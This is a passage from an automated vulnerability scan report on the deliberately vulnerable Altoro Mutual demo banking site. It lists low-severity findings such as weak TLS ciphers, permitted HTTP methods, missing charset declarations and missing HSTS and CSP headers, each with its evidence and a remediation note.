Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 622 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
http://www.openssl.org/docs/apps/ciphers.html
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA384
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA256
Cipher Suite: TLSv1_2 : ECDHE-RSA-AES128-SHA
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 623 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
No remediation is necessary.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 624 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 625 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117:8080/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 626 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 627 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
No remediation is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:8443/bank/
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 628 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net:8443/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 629 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: https
ip_address: 65.61.137.117
port_number: 8443
ssl_enabled: true
transport_protocol: tcp
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:80/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 630 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 631 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117:8443/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 632 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 633 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 634 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 635 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://65.61.137.117:8443/ HTTP/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 636 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Example of response header use-
Strict-Transport-Security: max-age=31536000
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 637 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 638 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://demo.testfire.net:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 639 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 640 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 641 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 642 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 643 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 644 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 645 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 646 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 647 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 648 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:443/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 649 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 650 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 651 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 652 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 653 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 654 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 655 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 656 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 657 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170"
height="128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 658 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 659 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 660 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 661 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 662 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 663 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 664 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 665 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 666 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 667 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 668 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 669 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 670 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<br />
<b><a
